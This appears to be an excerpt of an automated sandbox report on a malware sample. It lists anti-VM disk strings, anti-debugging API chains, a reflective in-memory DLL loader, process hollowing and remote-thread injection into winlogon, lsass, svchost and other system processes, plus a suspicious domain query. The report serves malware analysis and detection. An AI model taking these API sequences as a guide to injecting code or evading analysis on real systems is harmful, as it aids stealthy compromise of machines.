Source: cmd.exe, 0000000D.00000003.2167756120.000001929145C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: svchost.exe, 0000000C.00000002.3537889353.00000195DD66A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_7-616
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_7-702
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001E85898CD80
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E858981E3C LoadLibraryA,GetProcAddress,SleepEx,8_2_000001E858981E3C
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140001CF0 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModulesEx,ReadProcessMemory,CloseHandle,GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,7_2_0000000140001CF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001E85898CD80
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001E8589884B0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E858988814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000001E858988814
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589BCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001E8589BCD80
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589B84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001E8589B84B0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589B8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000001E8589B8814
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001E8589ECD80
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001E8589E84B0
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000001E8589E8814
Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE868814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00000140AE868814
Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE8684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000140AE8684B0
Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE86CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000140AE86CD80
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DD5C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00000195DD5C8814
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DD5C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000195DD5C84B0
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DD5CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000195DD5CCD80
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DE1ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000195DE1ACD80
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DE1A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00000195DE1A8814
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DE1A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000195DE1A84B0
Source: C:\Windows\System32\cmd.exeCode function: 13_2_00000192913E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00000192913E84B0
Source: C:\Windows\System32\cmd.exeCode function: 13_2_00000192913E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00000192913E8814
Source: C:\Windows\System32\cmd.exeCode function: 13_2_00000192913ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00000192913ECD80
Source: C:\Windows\System32\cmd.exeCode function: 13_2_00000192916284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00000192916284B0
Source: C:\Windows\System32\cmd.exeCode function: 13_2_0000019291628814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0000019291628814
Source: C:\Windows\System32\cmd.exeCode function: 13_2_000001929162CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000001929162CD80
Source: C:\Windows\System32\conhost.exeCode function: 14_2_00000139F96D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00000139F96D8814
Source: C:\Windows\System32\conhost.exeCode function: 14_2_00000139F96DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000139F96DCD80
Source: C:\Windows\System32\conhost.exeCode function: 14_2_00000139F96D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000139F96D84B0
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001160CB38814
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001160CB384B0
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001160CB3CD80
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001160CB98814
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001160CB984B0
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001160CB9CD80
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CBC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001160CBC8814
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CBC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001160CBC84B0
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CBCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001160CBCCD80
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000257E10A84B0
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00000257E10A8814
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000257E10ACD80
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000257E10D84B0
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00000257E10D8814
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000257E10DCD80
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000001428DD0CD80
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000001428DD084B0
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_000001428DD08814
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000001428DD3CD80
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000001428DD384B0
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_000001428DD38814
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C9384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001F28C9384B0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C938814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_000001F28C938814
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C93CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001F28C93CD80
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C9684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001F28C9684B0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C968814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_000001F28C968814
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C96CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001F28C96CD80
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001CA985484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001CA985484B0
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001CA9854CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001CA9854CD80
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001CA98548814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000001CA98548814
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D2653184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001D2653184B0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26531CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001D26531CD80
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D265318814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_000001D265318814
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D2653484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001D2653484B0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26534CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001D26534CD80
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D265348814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_000001D265348814
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000254A2D484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000254A2D484B0
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000254A2D48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00000254A2D48814
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000254A2D4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000254A2D4CD80
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B87DD84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000024B87DD84B0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B87DD8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_0000024B87DD8814
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B87DDCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000024B87DDCD80
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B8848CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000024B8848CD80
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B88488814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_0000024B88488814
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B884884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000024B884884B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00000205FD40CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00000205FD40CD80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00000205FD4084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00000205FD4084B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00000205FD408814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00000205FD408814
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001A2056ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000001A2056ACD80
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001A2056A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000001A2056A84B0
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001A2056A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_000001A2056A8814
Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000018EC1F6CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0000018EC1F6CD80
Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000018EC1F684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0000018EC1F684B0
Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000018EC1F68814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_0000018EC1F68814
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE3E0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0000025CE3E0CD80
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE3E084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0000025CE3E084B0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE3E08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_0000025CE3E08814
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE4178814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_0000025CE4178814
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE41784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0000025CE41784B0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE417CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0000025CE417CD80

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\svchost.exeDomain query: capacity-sg.gl.at.ply.gg
Source: 28.2.powershell.exe.240b2d00000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.VirtualAlloc(PtrAdd(pCode, iMAGE_SECTION_HEADER.VirtualAddress), (UIntPtr)sectionAlignment, AllocationType.COMMIT, MemoryProtection.READWRITE)
Source: 28.2.powershell.exe.240b2d00000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.LoadLibrary(PtrAdd(pCode, iMAGE_IMPORT_DESCRIPTOR.Name))
Source: 28.2.powershell.exe.240b2d00000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.GetProcAddress(intPtr2, PtrAdd(PtrAdd(pCode, intPtr5), 2))
Source: 28.2.powershell.exe.240b2d00000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.VirtualProtect(P_0, P_1, P_2, out P_3)
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,7_2_0000000140002434
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 58952EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: ADFC2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: DD592EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: CD32EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: E1072EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 8C1D2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 97FD2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 652E2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A27C2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87DA2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: FB3C2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5672EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: C1F32EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: E3BC2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 38952EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6E562EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 1FF72EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F352EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 79572EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A462EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 13112EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 8C582EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5F1D2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 58952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ADFC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD592EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CB62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E1072EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C1D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 97FD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 652E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A27C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 87DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FB3C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5672EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C1F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E3BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 38952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E562EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1FF72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 79572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A462EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13112EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C582EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F1D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E062EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AEC92EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: DC1B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 82532EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\spoolsv.exe EIP: A62EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 66EB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: FD9A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CEDB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 42792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B6F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8DCD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 73832EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F9DA2EBC
